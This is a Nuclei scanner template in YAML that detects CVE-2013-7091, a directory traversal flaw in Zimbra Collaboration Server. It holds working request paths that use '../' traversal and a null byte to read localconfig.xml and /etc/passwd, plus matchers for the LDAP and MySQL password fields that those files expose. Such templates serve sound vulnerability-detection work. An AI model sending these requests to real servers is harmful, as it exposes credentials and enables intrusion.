56 lines
2.5 KiB
YAML
56 lines
2.5 KiB
YAML
id: CVE-2013-7091
|
|
|
|
info:
|
|
name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion
|
|
author: rubina119
|
|
severity: medium
|
|
description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
|
|
remediation: |
|
|
Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
|
|
- https://www.exploit-db.com/exploits/30085
|
|
- https://www.exploit-db.com/exploits/30472
|
|
- http://www.exploit-db.com/exploits/30085
|
|
- http://packetstormsecurity.com/files/124321
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2013-7091
|
|
cwe-id: CWE-22
|
|
epss-score: 0.97337
|
|
epss-percentile: 0.99881
|
|
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: synacor
|
|
product: zimbra_collaboration_suite
|
|
tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
|
|
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "zimbra_server_hostname"
|
|
- "zimbra_ldap_userdn"
|
|
- "zimbra_ldap_password"
|
|
- "ldap_postfix_password"
|
|
- "ldap_amavis_password"
|
|
- "ldap_nginx_password"
|
|
- "mysql_root_password"
|
|
condition: or
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root=.*:0:0"
|
|
# digest: 4a0a00473045022100f6cd40b93273474a23d293f197030390d10be43a736527361263f75941c19a1d02207e345080ec279f07c8b1a96d149c3a01abc367600abfbbf63a85dd89a95ef78b:922c64590222798bb761d5b6d8e72950 |